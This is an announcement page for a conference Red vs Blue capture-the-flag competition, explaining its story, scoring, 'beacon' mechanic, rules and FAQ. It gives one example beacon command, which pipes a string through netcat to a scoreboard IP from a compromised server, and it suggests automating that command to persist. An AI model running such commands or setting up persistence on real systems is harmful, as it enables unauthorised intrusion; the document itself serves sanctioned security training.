Red vs Blue CTF
Along side our regular jeopardy CTF, this year we're also going to be running a RedvBlue style CTF, for more info...keep reading
Story
You have been hired by CrapCorp international to defend their network. Their old sysadmin known as ShittySysAdmin quit last week, after people made fun of his DNS skills. The company thought he did a good job, but...they suspect the network might be insecure.
Its your job to enumerate the network, find and fix the vulnerabilities, and also detect and kick out any possible attackers out.
Information
WTF is this?
RedVBlue CTF is a competition between several teams, all provided with the same set of vulnerable servers, and need to defend them from attacks from the other teams...and...attack the servers of the other teams.
There is a "scoreboard" which monitors some services on each teams network. If everything is good, and working fine, your teams score will go up. If services or servers are inaccessible, your teams score will stop going up.
When the game starts, each team will be only be able to access their own servers networks. From here, you will have TBC amount of time to enumerate your servers, login, find and fix the vulnerabilities, reset passwords etc. But also...LEARN how you could attack these servers, as you will be doing. After TBC amount of time has elapsed, the firewall rules will be opened up, and all teams will be able to access all other teams servers too.
Examples of what attackers could/should do to "mess" with a server are:
- Stop the service
- Stop the server (Shutdown)
- Modify a servers config file, so it does not start correctly (Don't blitz the entire
config file, just maybe modify it on the first line with "hacked by Blue Team 2". Basically something that will stop the service loading, but the defending team can easily find out what has broke and fix it)
For examples of whats attackers should NOT do can be found in the rules, but basically, no destructive actions. Yeah yeah, you could delete the apache binary, or rm -rf the box. Please don't.
The team with the highest score at the end of the game, Wins! So keep your servers up and their services running and you'll do well.
BUT! Theres a way to reduce a teams score. "Beacons"!
Whats a "beacon" you may ask? A beacon is basically a unique string, which someone sends from a compromised server back to the scoreboard. Each team will have their own set of unique strings. Once the scoreboard receives this string, it will detect who's string it is (e.g Blue Team 1) and where it's coming from (e.g Blue Team 4). It will then put an icon on the scoreboard, againest the compromised team (e.g Blue Team 4), which will have the colour of the team who's string it matches (e.g Blue Team 1)
Basically, it's a way of an attacker on a compromised server to say "Hey....i'm here! Come find me!" But, if your team has a "beacon" on one of your compromised hosts, your team will start LOSING points. You also won't know which server the beacon is coming from, you have to find where it's coming from, kill it, find the attacker who launched it, and block them from getting back in.
An example of how to launch a beacon might be **echo "hi-dook-woz-ere" | nc 10.10.10.10 51000**. Was a beacon is launched, and detected by the scoreboard, it will be valid for 5mins, then it will disappear from the scoreboard. So, the attacker must run it again, or.....find a way to have it being sent automatically every 5mins, and...move on and pop another box.
Additional Info
The scoreboard will display the name of the server being monitored, along with the port numbers being monitored too. If it's Green...Good job! If it's Red...Ummm bad!
The game will start with TBC number of vulnerable servers for each team...this doesn't mean these will be the only servers you have to protect/attack. The admin team will add additional servers, whenever they like.
The admin team may also add addtional services to be monitored, or change them...just depends how we're feeling TBH 😂
The admin team WILL be monitoring servers & services seperately from the scoreboard, if we see something that's not right, we'll have a word with a team to fix something, otherwise we'll start docking points. An example of this might be a server running a WordPress site, if the Blue Team simply removes the WordPress site, but keeps the web server running (e.g Port 80) thats not the point, keep the installed services running, otherwise, docked points!
This page will be updated with new FAQ etc, and info regularly.
Game Rules
No attacking out of scope systems, this includes the scoreboard, ESX infrastructure, networking, CTF admin team or other players. Only attack systems in the following
subnets.
- TBC (Blue Team 1)
- TBC (Blue Team 2)
- TBC (Blue Team 3)
- TBC (Blue Team 4)
No DOS attacks. Yes we know these can make servers inaccessible, so they can't be scored but. It's not the point, performing a DOS isn't cool. Just don't do it please.
NO USE OF HOST BASED FIREWALLS! - I know, this is the best way to stop people attacking your systems, but this isn't the point of the game. The admin team will have some monitoring which allows us monitor systems to see if host based firewalls are enabled. When we talk about host based firewalls, we mean Windows Firewall, LInux firewall (iptables etc).
No "destructive" actions. (Unless the admin team say otherwise). By this i mean, no rm -rf on a box, no deleting binaries, or modifying them so they can't run. No deletion of existing user accounts.
Player Requirements
You'll need to have a ticket to the con.
We hope that players will be able to dedicate most of their time taking part in the CTF. Obviously we won't be stopping you doing whatever you want, you bought a ticket for the con, and don't want you missing out on talks, etc. But, if you can only play for an hour, then...maybe don't apply.
You'll need to bring a laptop to play on. Doesn't matter what OS you run, but if you're not sure, we'd recommend having Kali on it, be it a VM or on the host.
Connection into the RedVBlue CTF networks via ethernet (cable). There will be NO wireless connection to the CTF, why not? Because this stops a team having heaps of extra people playing, and making the teams uneven.
FAQ
Where did the idea for this CTF come from?
dook has been lucky enough to take part in ProsVJoes CTF, which runs at some conferences in the US (Mainly BSidesLV) This CTF is like the one being run at CrikeyCon, but...no steroids! Heaps more servers, a dedicated Red Team attacking all the Blue Teams, active users in the environment, who lodge "Help Desk" tickets for the Blue Teams to complete, or call you on a VOIP phone on your desk. It's an amazing CTF, and if you ever get the chance, i highly recommend you take part.
What are the prizes for winning the CTF?
We may do trophies, just for the lolz, but aside from that, you win bragging rights of kicking other teams butts.
What happens if someone DOES do a destructive act to a server?
We hope this won't happen, but if it does, we will liase with the Blue Team, revert the server to a snapshot, and allow only them access to it while they re-defend it again. If we can determine which attacking team did it, we WILL dock points. Just please don't, it's not the idea with this CTF.
You keep mentioning 'it's not the idea of this CTF", so...what is the idea?
Enumerate your boxes to discover the vulnerabilities, fix them, detect and kick out attackers, and attack fellow teams.
How many teams/players will there be?
There will be a limit on the number of teams and players. Hopefully we'll have 4 teams, with 8 players in each team.
If we have a vulnerable service running, such as an FTP server, can we just shut that down, and run a DIFFERENT FTP server program? Or, if we have as vulnerable webapp, can we just disable that web app and keep the web server running?
No. Otherwise, everyone would do this. The scoreboard you'll see during the CTF isn't that good at actually monitoring content of servers. So the admins have a 2nd scoreboard running in the background, that monitors services for "content" such as. Do we see this banner on the FTP server? Or, Do we see this vulnerable web app on port 80? If that starts seeing services offline, we will start manually docking points.
The idea is, is to fix your current vulnerable services to be the same, but....not vulnerable.
Still interested? Register your interest below: